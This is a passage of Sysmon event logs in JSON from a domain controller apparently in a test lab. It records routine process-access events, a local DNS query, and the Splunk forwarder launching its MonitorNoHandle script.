05:46:50.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2110,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2111,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-0010FFEE0300}\r\nTargetProcessId: 3940\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-0010FFEE0300}","TargetProcessId":"3940","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2112,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.410\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nProcessId: 2804\r\nQueryName: WIN-DC-881393\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\dfsrs.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.410","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001095B80200}","QueryName":"WIN-DC-881393","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\dfsrs.exe","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2113,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.354\r\nProcessGuid: {A837DB8D-01CA-5F25-0000-00109FF10300}\r\nProcessId: 4064\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\MonitorNoHandle.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.354","ProcessGuid":"{A837DB8D-01CA-5F25-0000-00109FF10300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\MonitorNoHandle.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2114,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.344\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-001028D00300}\r\nTargetProcessId: 4064\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.344","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-001028D00300}","TargetProcessId":"4064","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2115,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.344\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-001028D00300}\r\nTargetProcessId: 4064\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.344","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-001028D00300}","TargetProcessId":"4064","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2116,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2117,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2118,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 